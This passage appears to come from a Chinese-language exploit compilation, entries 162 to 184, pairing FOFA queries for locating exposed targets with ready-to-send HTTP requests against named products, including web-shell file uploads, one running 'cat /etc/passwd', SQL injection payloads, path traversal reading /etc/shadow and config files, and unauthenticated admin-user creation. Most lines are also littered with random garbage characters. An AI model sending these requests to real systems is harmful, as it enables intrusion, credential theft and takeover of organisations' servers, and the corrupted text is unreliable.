: g: H  j2 j1 ^Content-Type: text/xml' Y% R( [1 {& X( M8 d
Accept-Encoding: gzip8 D$ w' Z- n3 T1 d

2 r% o; X. ?) s2 T* v; o<?xml version="1.0" encoding="utf-8"?>8 L% e1 R) O" I& W- m! P) g8 [$ R5 U
<soap:Envelope xmlns:xsi="
0 q5 X) h( L) r/ \http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema"
+ d& F8 J5 ]/ P* x" n- B& rxmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
! c% p4 G1 R. n' B- {<soap:Body>2 g7 D9 h3 u5 Y( M" r; H
<UploadResume xmlns="http://tempuri.org/">
- H: R/ K) d8 {. t) ]6 i<ip>1</ip>
7 M2 U$ u1 y6 u' S; D  Z& x<fileName>../../../../dizxdell.aspx</fileName>
! a. O" Z* w/ ]& H" E& y  D8 f<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
0 u! {; g5 A4 z- U<tag>3</tag>
5 {! [* w: q9 m) ]. ?</UploadResume>
1 o, K! h; l+ X$ d" A% Z- P; U# U</soap:Body>
, K$ T' h8 ^( e</soap:Envelope>
6 z& @# ^% m( S- F. E5 t/ Z* l! B' O3 J; k0 i/ Z, A, T
2 n  E7 ~4 V3 P, v# R0 R8 [
http://x.x.x.x/dizxdell.aspx
0 N  {3 w/ f& F8 b+ _
7 }# z- r) |$ M% L! X& H162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传4 e2 e: V! m& f/ m: `$ B
FOFA: app="和丰山海-数字标牌"* Y# \; [6 d; t. j5 I& x/ q
POST /QH.aspx HTTP/1.1" Y/ n# x& y1 k
Host: x.x.x.x3 Y5 e; h; |: \# q8 y. ]- L0 z/ W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/114.0! \* l' F7 H2 I. q" O# s
Connection: close
, `+ E  U& A5 z6 n' o9 TContent-Length: 583
8 e$ d* B$ U2 m; XContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryeegvclmyurlotuey; ^. @9 n; b) D- W
Accept-Encoding: gzip
3 C5 L: j% R" y8 k; i4 }, {
( g- e2 y$ c* Q2 P, \+ \------WebKitFormBoundaryeegvclmyurlotuey
# A9 M7 v" {4 I- k- g' oContent-Disposition: form-data; name="fileToUpload"; filename="kjuhitjgk.aspx") K4 A* g* K4 q( e6 X+ i2 R
Content-Type: application/octet-stream
+ L1 L$ C! F! U$ A
7 o, r9 a# o2 r3 u1 O<% response.write("ujidwqfuuqjalgkvrpqy") %>
1 B. L# I1 B6 S------WebKitFormBoundaryeegvclmyurlotuey. h. e( }  L4 E/ Q! d2 Z5 m
Content-Disposition: form-data; name="action"
2 U; l3 E2 Z  A0 \- u* p, m4 S
( t4 g) o8 l( N. X$ y* Mupload- b8 U: R6 G1 R1 x- Z9 W4 h
------WebKitFormBoundaryeegvclmyurlotuey$ l2 |7 C" b1 {+ r  N8 C
Content-Disposition: form-data; name="responderId"; w+ [& g1 T. e: ?
1 U  P3 q+ {6 K6 M! M8 Y6 `
ResourceNewResponder
9 T0 q4 @/ Z0 o; b9 L7 y- c3 z------WebKitFormBoundaryeegvclmyurlotuey
+ H  @) ]) a" A% }! T, UContent-Disposition: form-data; name="remotePath"
, r5 G( o, @& r* }4 b! P7 z) n- s  J! P
/opt/resources4 d  _" C6 O$ f* M7 \1 w5 P6 n& X6 V
------WebKitFormBoundaryeegvclmyurlotuey--' m; H6 b+ i. f! E# ~

) Q4 S  x9 x' R3 O& Y2 S$ }' \6 l/ m# k" E+ k' f# g7 P
http://x.x.x.x/opt/resources/kjuhitjgk.aspx
; f; u; M* x$ y
  t& M- E) V# }163. 号卡极团分销管理系统 ue_serve.php 任意文件上传6 l/ ^3 `. S. Q5 R+ v
FOFA: icon_hash="-795291075", }: N" K3 d* G) a4 u
POST /admin/controller/ue_serve.php?action=image&encode=utf-8 HTTP/1.1" Y8 O6 e! C6 P' [- {
Host: x.x.x.x% e6 I2 [8 |/ `! _
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36# L* p8 u1 R5 g! ~4 E, ^
Connection: close
8 \$ }' z8 }, G. AContent-Length: 293  n3 e5 a, g% E! a* V. a/ B
Accept: */*& a! Q) y% ]1 p" M
Accept-Encoding: gzip, deflate7 j# E  k$ s0 Q2 `
Accept-Language: zh-CN,zh;q=0.9" C; d( E0 n9 ^" K. V' j
Content-Type: multipart/form-data; boundary=----iiqvnofupvhdyrcoqyuujyetjvqgocod3 Y6 ]9 y) |& o  |! c. \
0 r, B3 c  B  x! O6 ~( h
------iiqvnofupvhdyrcoqyuujyetjvqgocod
3 f( c& J1 s3 w6 \  ]Content-Disposition: form-data; name="name"" Z! K; |7 _% h! s

( V0 w$ F# D  v! W, o1.php
- @/ @8 G* C* U# F------iiqvnofupvhdyrcoqyuujyetjvqgocod
- j) G, J9 N' ?  Q$ N8 Q: {9 {Content-Disposition: form-data; name="upfile"; filename="1.php". M7 a. c' K  J3 ?9 M7 J- Z. j
Content-Type: image/jpeg
6 j, g6 r5 r( l; F: k. I
. F9 m& }" P3 J6 J3 Hrvjhvbhwwuooyiioxega
6 ?. s8 R. T: ^; m------iiqvnofupvhdyrcoqyuujyetjvqgocod--& t$ ]" B" R) ^* p
! s* G+ J. N) b+ M- Q7 j! l
4 A! U; _* e& {' |% c7 x% d. o
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传
3 P6 S6 ~8 S* [( b. ZFOFA: title="智慧综合管理平台登入". A7 D6 X* `8 s' G8 V$ M- M) |
POST /Module/FileUpPage/FileUpProductupdate.aspx HTTP/1.1
* o& [3 D: j9 Y$ [9 kHost: x.x.x.x  w# u8 x0 n6 e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0$ J# r5 x7 o- ?  x9 v! G" I6 J
Content-Length: 288& R- c% \& G+ D9 t
Accept: application/json, text/javascript, */*; q=0.01
/ f2 f5 y0 d4 S9 X* iAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2,4 p( u0 N5 M7 D  d
Connection: close8 o3 j0 p( Y$ e. P( ^1 n
Content-Type: multipart/form-data; boundary=----dqdaieopnozbkapjacdbdthlvtlyl' u, m. Q) o  e: _1 P0 w& h3 b
X-Requested-With: XMLHttpRequest: ~6 d8 M+ {7 Y" H& n$ B
Accept-Encoding: gzip
- b! C' m/ u1 q9 l+ Z; Z
; B- E, ]5 m6 w' c4 L( |" `4 B------dqdaieopnozbkapjacdbdthlvtlyl
: R8 y, k8 G) H$ {Content-Disposition: form-data; name="Filedata"; filename="qaz.aspx"
" j  q" ?2 Q9 u2 N, ~Content-Type: image/jpeg- f7 }* ?! P+ s2 \; Y
  e$ \1 u3 y6 g6 h' n! v  J* f3 s0 E" _
<%@Page Language="C#"%><%Response.Write("aitwpovoxwtgixpfqiys");System.IO.File.Delete(Request.PhysicalPath);%>+ t4 c; ~3 K3 l
------dqdaieopnozbkapjacdbdthlvtlyl--% ^" _, b1 J. k* L5 Q2 V

. |9 B5 c0 M. H1 H' r. O9 G; M- ~
8 }* a: K  {: f) @http://x.x.x.x/Upload/Publish/000000/0_0_0_0/update.aspx& d$ b. ~# S8 B5 \: b

6 K) Q6 B# Y! f165. OrangeHRM 3.3.3 SQL 注入
7 M) P# J% J+ ^. _- ~CVE-2024-36428) d1 q+ v: Q7 s3 J1 x! I, C
FOFA: app="OrangeHRM-产品": p" h9 L2 E! F" P- V, w
URL:https://192.168.1.28/symfony/web ... e&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END)). V5 s/ L$ u( H6 ]

8 C  H3 o; M' O# l  X# x7 L' |1 i3 s% k! F$ x9 A
166. 中成科信票务管理平台SeatMapHandler SQL注入
  W/ P- W  N1 y4 K' ~FOFA:body="技术支持:北京中成科信科技发展有限公司"# @1 Q" Q& P6 ^0 {2 |' t
POST /SystemManager/Comm/SeatMapHandler.ashx HTTP/1.1
) j4 g$ ]* x$ {7 Z6 w* G: C6 FHost:! I; ~* ~& M4 Y( t3 x0 k
Pragma: no-cache" i# t2 C. C- k
Cache-Control: no-cache0 Q  b! Y. @2 A0 s
Upgrade-Insecure-Requests: 1: x/ Y7 V. H. N9 v0 m/ j8 N- n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.369 t! X1 h: ]- ]( ]# R
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7( D. z( d2 z) R  T3 |- E
Accept-Encoding: gzip, deflate8 a9 K2 v8 V* a6 O& W- @' J) d
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
6 |7 \3 x+ |) w# d  ]- _) {9 T" ^5 pCookie: ASPSESSIONIDCCRBRCTD=LHLBDIBAKDEGBCJGKIKMNODE: ]- V$ q  H; @: N" f& Y
Connection: close
7 E( H2 ~* ?0 ?) o. HContent-Type: application/x-www-form-urlencoded$ y  D5 @3 h; B) G- w' E
Content-Length: 89
6 `/ O+ H9 Z' f5 G; r; I3 B, F* ]
" z; k' V8 R! a# R+ \2 s6 A. S& dMethod=GetZoneInfo&solutionNo=%27+AND+4172+IN+%28SELECT+%28CHAR%28104%29%2BCHAR%28101%29%2BCHAR%28108%29%2BCHAR%28108%29%2BCHAR%28111%29%29%29--+bErE
* A- H! x# T, b6 ^2 m3 S: }; ]

& j+ K- I9 S5 S' i& h8 ~3 J0 i167. 精益价值管理系统 DownLoad.aspx任意文件读取
6 L& j& r" p3 r: r9 p+ EFOFA:body="/ajax/LVS.Core.Common.STSResult,LVS.Core.Common.ashx": Y) K2 w9 l1 d* j+ P$ _
GET /Business/DownLoad.aspx?p=UploadFile/../Web.Config HTTP/1.1
% f! }: p4 W6 Q) B* t; s  T% vHost:
) t) {: b' b% V( bUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
$ z3 Y8 Q* k  A$ P! ^7 ~9 p5 W, {- FContent-Type: application/x-www-form-urlencoded) E. j* L3 a/ H: Y) b2 y% l- ~' n0 X2 C
Accept-Encoding: gzip, deflate
/ F- s: x1 @5 d4 D' |% L& a/ W0 LAccept: */*
) n) e/ M2 b- JConnection: keep-alive/ l: L1 ~3 F# ]* v- |4 q/ g" j" _" s

- A3 x9 \0 I* o* n# ]2 ^3 y7 o8 X- }, Y: {% U) b8 \
168. 宏景EHR OutputCode 任意文件读取
' q  E2 J( R% w+ a0 K4 ?FOFA:app="HJSOFT-HCM"9 {9 T9 f7 `9 H" a9 i2 S$ F
GET /servlet/OutputCode?path=VHmj0PAATTP2HJBPAATTPcyRcHb6hPAATTP2HJFPAATTP59XObqwUZaPAATTP2HJBPAATTP6EvXjT HTTP/1.14 i( a. R; U: Z* Y0 A* Z* a& |
Host: your-ip2 h% y- a: L* G5 q$ N3 L" u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36
, V4 {2 T. B2 x7 }6 X2 eContent-Type: application/x-www-form-urlencoded( t3 B0 w; W7 J; t$ W1 L
Connection: close
; L* s8 v2 s" M3 ?
8 M9 b$ f* u! z; n, F. Y3 J3 r# @/ }7 y0 s# F
- _9 \' [& O: u) Y& Q4 B' [
169. 宏景EHR downlawbase SQL注入
$ g- H% A$ r3 V0 w8 R% n4 ]FOFA:app="HJSOFT-HCM"
3 m2 ~" C$ e$ G/ Y, l9 KGET /templates/attestation/../../selfservice/lawbase/downlawbase?id=1';WAITFOR+DELAY+'0:0:5'--+ HTTP/1.1
8 m, ^& D7 v) i+ P* YHost: your-ip# Z" s/ p( `5 G; I! }) g/ I6 \
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.365 {  W# x7 ^! B* M* B+ N
Accept: */*
7 ]$ K; }; t$ x2 e+ b  d4 CAccept-Encoding: gzip, deflate, y6 e: Z7 O7 N/ @
Connection: close. j4 [8 I  O/ j# `/ g0 X" O

9 @- u- h. e- B& y. A. O$ o1 b( H  o5 j8 X* E7 t

0 l0 Z" [% J( g170. 宏景EHR DisplayExcelCustomReport 任意文件读取
* _- ~2 ]; s$ T# U0 V# ^- fFOFA:body="/general/sys/hjaxmanage.js"
8 a- R& @( T0 b- H8 N/ w( [POST /templates/attestation/../../servlet/DisplayExcelCustomReport HTTP/1.1
- f0 T! e! D* B( s" F: E5 q3 [Host: balalanengliang
, T6 S4 O; {& I1 i" aUser-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
- C8 M; n" t: H* g4 U# r' }Content-Type: application/x-www-form-urlencoded3 J5 \1 x. q- ?; G: A3 b; @6 V: \

3 g" v6 i* h0 {7 U3 ^filename=../webapps/ROOT/WEB-INF/web.xml
( J+ i3 p7 @5 K1 }- s9 r! N# H5 O! m4 n% u( d, c$ ^

0 f" Q9 P0 u# M- O  s3 z. C171. 通天星CMSV6车载定位监控平台 SQL注入
5 s$ C  Q3 f1 k- s. e4 M) LFOFA:body="/808gps/"; d0 g, s& \9 k/ n7 G3 i- s) }
GET /run_stop/delete.do;downloadLogger.action?ids=1)+AND+(SELECT+5394+FROM+(SELECT(SLEEP(5)))tdpw)--+&loadAll=1 HTTP/1.16 j, j* K, r/ d
Host: your-ip
. M; s1 m1 _4 q( H* t7 I# fUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
3 s5 g- J7 k* X; qAccept: */*
( r* `5 b+ r' f& @' T% j( SAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
- E1 ]0 i% `, A- `5 `Accept-Encoding: gzip, deflate: O7 N( B1 Z9 K
Connection: close0 N# N- v  j$ R  C( h2 N
# g. a8 R+ g  l

$ [2 Z4 _" [4 r
" V: T+ y& h% r4 v/ R1 t& b172. DT-高清车牌识别摄像机任意文件读取
. s! v( j/ m9 A+ c9 ]5 kFOFA:app="DT-高清车牌识别摄像机"9 M. ~5 G4 P9 i; P: G# M
GET /../../../../etc/passwd HTTP/1.1& A7 Y: j% P3 t/ {! y# S) M2 L& ]% T7 l
Host: your-ip8 ~9 g* V# [# J  e( n5 r8 `: M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.363 ]. s7 m7 L4 r) k- {+ ]; O
Accept-Encoding: gzip, deflate5 l7 [/ n* o9 y: p. M: d4 s: Q
Accept: */*
( y( r) v& g. \5 Y! ?6 BConnection: keep-alive9 F% k% A* u9 v. F- U2 i. K4 }1 E( `' x6 ^

1 c& q; `% u; l( ~+ }. @9 F3 n& n% P9 y7 x+ u9 _
$ r$ y. n$ Y- ~' J( v7 i" J1 C
173. Check Point 安全网关任意文件读取
" r( l4 G5 j1 d- DCVE-2024-24919; v' M( M" h+ X- m: a- u5 e
FOFA:app="Check_Point-SSL-Network-Extender"1 i9 Z5 V3 y5 R
POST /clients/MyCRL HTTP/1.1
; }; }0 B. n' t9 D+ l" n, K1 cHost: your-ip
& W& c' D3 U6 }% EContent-Type: application/x-www-form-urlencoded
# e/ h1 w8 s3 P* P/ c. m$ i2 u: e( U' D( `
aCSHELL/../../../../../../../etc/shadow. }' o& E+ ~6 J+ ~: K& P
2 p. g: G* @" s, B( @" Q6 B+ A
9 w. J* I5 T: G" I7 D0 ?( G; |

; _% V0 p' v. r: p& z# x* u1 a174. 金和OA C6 FileDownLoad.aspx 任意文件读取+ N9 H/ z* N7 X7 `3 B
FOFA:app="金和网络-金和OA"* X8 Q" a3 B) U$ b" W  q, @/ \
GET /c6/JHSoft.Web.CustomQuery/FileDownLoad.aspx?FilePath=../Resource/JHFileConfig.ini HTTP/1.1. x* o) v. ^0 c) e' B% q% w% y
Host: your-ip1 V' t& h9 f5 A2 {
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
. \2 `" O& `. L9 h. x0 YAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
! B) g$ k  R+ L: m9 e" W+ nAccept-Encoding: gzip, deflate, br- r& z5 Y1 ]' m) T: N
Accept-Language: zh-CN,zh;q=0.94 u* o/ V" t: f- B: b+ o
Connection: close
5 l+ ~" m* G0 v$ B
3 l7 c) u* Z, e" R& L" ~7 s& o- r2 k  d. [( d

# |2 C% J  A7 b+ ?  o175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入) I6 ]& C' M6 y! `+ d+ c, Y
FOFA:app="金和网络-金和OA"
& ~, q, `1 g9 a3 H9 jGET /C6/JHSoft.Web.IncentivePlan/IncentivePlanFulfill.aspx/?IncentiveID=1%20WAITFOR%20DELAY%20'0:0:5'--&TVersion=1 HTTP/1.1- w7 t9 j8 S7 G* l7 j8 q! A' d. L9 }2 J
Host:
5 \3 m/ s, G1 W, lUser-Agent: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.365 M; q  ?) [" J6 E! t; u5 n
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8% W3 L: D# o0 X/ A: s9 ^. U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2# q5 S/ K7 t1 U; b! h
Accept-Encoding: gzip, deflate
+ p* I8 v* r+ c! M/ G$ VConnection: close
' f+ U* S* ~7 l, ?) e$ i* O+ `Upgrade-Insecure-Requests: 1
4 F; W! p  u2 g# D, T/ y
* W" X, F& B$ j$ C3 o2 U
: Q9 P) Z9 s. v( N) y$ q  F176. 电信网关配置管理系统 rewrite.php 文件上传5 G% L9 V7 N* z1 G7 ]& M
FOFA:body="img/login_bg3.png" && body="系统登录"
8 ^/ l) e: m3 [3 I2 b: uPOST /manager/teletext/material/rewrite.php HTTP/1.1
- [( L6 q2 T4 V. i6 j9 sHost: your-ip# C, p" m9 h- w, P
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0  _' k; N. d( R( m
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryOKldnDPT# o* C& u$ b7 |2 d# W  ?1 H0 ?: F
Connection: close" M/ h- U1 Q/ }$ }2 O$ m

) ^9 |# K, u8 Y4 D. S' T: V- O------WebKitFormBoundaryOKldnDPT
! L# y2 I1 B% q% R% M" b: @" m: aContent-Disposition: form-data; name="tmp_name"; filename="test.php"
$ ]# F2 \$ t4 N& k, o* NContent-Type: image/png. @5 A  k: U, w- W

+ I3 _' q) b5 L7 a0 v* k/ o* Q<?php system("cat /etc/passwd");unlink(__FILE__);?>6 J7 y& H4 X5 O3 s6 h: O
------WebKitFormBoundaryOKldnDPT
3 {5 c( N5 Z" X6 [9 t5 [Content-Disposition: form-data; name="uploadtime"
. u9 U7 ?; E3 L5 ^7 u- M- u
2 o+ Q) F+ R2 [$ m ! c, Z' p: H+ @/ |9 N
------WebKitFormBoundaryOKldnDPT--8 B3 e) g2 E4 a

2 X" L  N! O/ N3 e
( J3 h" L8 O: E* W* K, c  ^/ e) A2 w% x( k
177. H3C路由器敏感信息泄露( ?! o- @. D4 ^0 ~& d% h
/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
9 E' q9 ]; V0 ^3 E8 ]$ h  K/userLogin.asp/../actionpolicy_status/../M60.cfg1 F9 e; ?( a( a* r" w6 }  ]% ^! w
/userLogin.asp/../actionpolicy_status/../GR8300.cfg
$ B/ e' X& X. C3 a9 m( z/userLogin.asp/../actionpolicy_status/../GR5200.cfg
! y+ J, e$ ~2 J/userLogin.asp/../actionpolicy_status/../GR3200.cfg
1 E, F& ]2 v: D  A5 O: Z  F; f+ W# `/userLogin.asp/../actionpolicy_status/../GR2200.cfg
% P9 [7 G$ g) f0 Y) f/userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg
  M8 L0 h* u5 h$ N: g% H/userLogin.asp/../actionpolicy_status/../ER8300G2.cfg
8 B. t8 w) W( c$ F) B/userLogin.asp/../actionpolicy_status/../ER6300G2.cfg
/ |4 B! m# R! ]& P/userLogin.asp/../actionpolicy_status/../ER5200G2.cfg
* A9 q; G3 h" A- Q8 x$ F% c3 f" C/userLogin.asp/../actionpolicy_status/../ER5200.cfg
. O3 w, A# t% H9 C( a6 t8 ~# o: @5 ?! ^/userLogin.asp/../actionpolicy_status/../ER5100.cfg
! g" X7 [( V7 P6 a( Y- X  X% ]/userLogin.asp/../actionpolicy_status/../ER3260G2.cfg# \" }' c+ ?  f& w- ?
/userLogin.asp/../actionpolicy_status/../ER3260.cfg3 u2 V$ p; @  \( Y, V% N% I4 N3 @
/userLogin.asp/../actionpolicy_status/../ER3200G2.cfg+ f) m* O9 y# [' @4 k6 P6 `
/userLogin.asp/../actionpolicy_status/../ER3200.cfg
9 f, \9 D3 r0 c3 j* U/userLogin.asp/../actionpolicy_status/../ER3108GW.cfg- I  F' o6 ~  S* K) o% }! Y7 U
/userLogin.asp/../actionpolicy_status/../ER3108G.cfg/ W- \+ N' [; @3 q
/userLogin.asp/../actionpolicy_status/../ER3100G2.cfg- o" u  d( Q. N& l, x
/userLogin.asp/../actionpolicy_status/../ER3100.cfg
) W& h" M9 X3 R" F; T7 |4 Z# j2 H5 b/userLogin.asp/../actionpolicy_status/../ER2200G2.cfg  B# j9 k5 u, S
8 n) C2 z* q1 G; `0 ]( B
1 |7 {( i8 J% h# S
178. H3C校园网自助服务系统-flexfileupload-任意文件上传
7 O% h2 t: b. i% g1 JFOFA:header="/selfservice"0 x3 D. Y5 @0 Y1 E
POST /imc/primepush/%2e%2e/flexFileUpload HTTP/1.1
7 s# O9 W; x" k! N+ h7 Q: H* eHost:
: T  f, t  S3 Q9 l3 ~User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.364 H' \+ g- ]- o" h7 l  c9 R, {2 y
Content-Length: 252
" I/ ?5 D' ~+ R6 CAccept-Encoding: gzip, deflate
% B9 |7 `6 h) v' H: B( A7 G* MConnection: close& V5 ^4 D4 b! L8 C2 u
Content-Type: multipart/form-data; boundary=---------------aqutkea7vvanpqy3rh2l
6 m8 V; i- }6 P4 s2 K-----------------aqutkea7vvanpqy3rh2l
) q- X- U& r6 b" \4 d" d) fContent-Disposition: form-data; name="12234.txt"; filename="12234"
$ u1 e- M! k% K! `/ k7 J4 {Content-Type: application/octet-stream# l0 Z2 X# y" V$ @2 ~
Content-Length: 2552 v# K' d( c6 R6 c) H  |

) H3 |& r4 y4 Z1 q( D12234
, |" u: ^( r& d6 n-----------------aqutkea7vvanpqy3rh2l--
* j3 ?5 `* m  p6 y' k! S! x! ^" ?; P  D

/ v0 ^" z+ X, j; t; fGET /imc/primepush/%2e%2e/flex/12234.txt5 W% E0 m; ~/ P& {% g; f% |
( Q5 j, \) ]" ~7 K

' R) M9 j3 k* w/ D- r/ L179. 建文工程管理系统存在任意文件读取
# D) Z* Y8 J: L& rPOST /Common/DownLoad2.aspx HTTP/1.1& \5 K& Q6 E' c) q
Host: {{Hostname}}1 g# j/ n; L/ U
Content-Type: application/x-www-form-urlencoded& u' n. P# l: |
User-Agent: Mozilla/5.0
! ^  }6 Q/ H1 b* f/ ^+ u/ R* Q# v' S0 E  D- @6 _
path=../log4net.config&Name=
7 g( i/ q: \& A7 `
# O) c3 J# j" a$ Z' Q
. @% K: T0 F! X! t) N* h180. 帮管客 CRM jiliyu SQL注入
& ^# ^+ b' g( G# }FOFA:app="帮管客-CRM"1 c  B2 q  L" G
GET /index.php/jiliyu?keyword=1&page=1&pai=id&sou=soufast&timedsc=激励语列表&xu=and%201=(updatexml(1,concat(0x7e,(select%20user()),0x7e),1)) HTTP/1.10 H1 [: B8 G' h* V* \1 `7 i
Host: your-ip0 M* `3 n9 X0 i6 c8 Y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36' w) s5 K) d( B  p0 k) F' }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7# V0 V8 c7 r  ]5 s. n4 ~) y, \
Accept-Encoding: gzip, deflate' {. |" Q5 u+ _  F
Accept-Language: zh-CN,zh;q=0.9
; H% `( N1 D+ K7 b3 xConnection: close
0 P" J% L5 k; L4 \2 R) _
8 U! h1 X6 s  u& }5 \% ?% g; y* k9 r9 ~. ], ]* w/ }. ?* s
181. 润申信息科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; t' g4 x, H1 }FOFA:"PDCA/js/_publicCom.js"
- e, `1 g1 h4 X. n  HPOST /PDCA/ashx/UpdataLogHandler.ashx HTTP/1.1
  S9 g6 F4 J' S' x' Z( `Host: your-ip
4 k& _7 B2 ?7 E) p* l! lUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
0 i; q. f' o7 a8 w6 d; _% bAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
6 G& q2 O& H/ a* `& I) x2 N9 s5 f. HAccept-Encoding: gzip, deflate, br+ R3 Q/ k% h9 z
Accept-Language: zh-CN,zh;q=0.9
( T. \; _' B7 N" q$ g$ D! YConnection: close
  C+ U( f9 b4 H: T; e$ GContent-Type: application/x-www-form-urlencoded2 e/ @) ?8 c! M
9 A" ]1 }: |  K; |
+ b- x1 j! b+ @  R( D6 I
action=GetAll&start=' WAITFOR DELAY '0:0:5'--&end=&code=11&type=2&page=1&rows=20
! j$ r7 k* Z" k+ ^7 m/ o, t; Q# V2 Y" x: {; A: j1 w
, p& d* z( {9 L6 E
182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建2 ~! L; ]- l/ j" A; c1 O$ O0 {
FOFA:"PDCA/js/_publicCom.js"( C7 K* p* f2 L& N( B
POST /PDCA/ashx/AddNewsHandler.ashx?action=Adduser HTTP/1.1$ B1 J" \5 E4 k9 y( r
Host: your-ip2 R7 q- o# }4 c! W
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36" b! R! z- W+ [8 r# B. Y
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7) J' W2 |/ b, U1 M: `
Accept-Encoding: gzip, deflate, br5 I4 V- d) Q) Q7 n$ M% R  H
Accept-Language: zh-CN,zh;q=0.9
. J, t0 j, P% O6 x* bConnection: close  h! A6 X: u# m/ k
Content-Type: application/x-www-form-urlencoded
6 G/ W/ ?& h% P0 p$ X" i" z+ A: Q
# l& V# i- a* ~' F( I' X) p/ L1 r2 R3 z0 \
username=test1234&pwd=test1234&savedays=1
* i  J' m4 ~( m% t; z* F" J
3 R* S' x, L6 @6 \$ Q6 q1 P* z7 J0 B: G' L
183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入+ p" x4 \8 g  Q7 i, J2 k5 n4 U& P
FOFA:body="interlib/common/" || body="Interlib图书馆集群管理系统" || body="/interlib3/system_index" || body="打开Interlib主界面"
8 y* ~# E( N3 @1 D8 J$ M6 NGET /interlib3/service/sysop/updOpuserPw?loginid=admin11&newpassword=Aa@123456&token=1%27and+ctxsys.drithsx.sn(1,(select%20111111*111111%20from%20dual))=%272 HTTP/1.1
$ }. D; j0 O6 l) EHost: your-ip
  X" a' z2 L5 K3 _4 X2 @User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.367 P% F% A) n7 l7 C& o8 Q  V
Accept-Charset: utf-8) M: M8 E% L% `$ \  C* }- T9 A- ?  _( s
Accept-Encoding: gzip, deflate% ?" i4 [2 N0 j$ a. p
Connection: close
& Z2 x/ G" R1 |" |( }" a/ ]6 o5 C$ m6 f
$ Z5 Y' W/ y/ R3 x; {% O9 c2 _1 ~: K9 B
184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加9 n8 m$ C( {3 R" n6 [( c
FOFA:server="SunFull-Webs"
3 n. p& n) N1 O. p4 YPOST /soap/AddUser HTTP/1.1
% w* M; w' p; O' y' UHost: your-ip. H% V: i) O+ F4 P$ ~; c+ Q* G
Accept-Encoding: gzip, deflate& [1 x0 U$ N5 q% a: O- F# ^2 ?
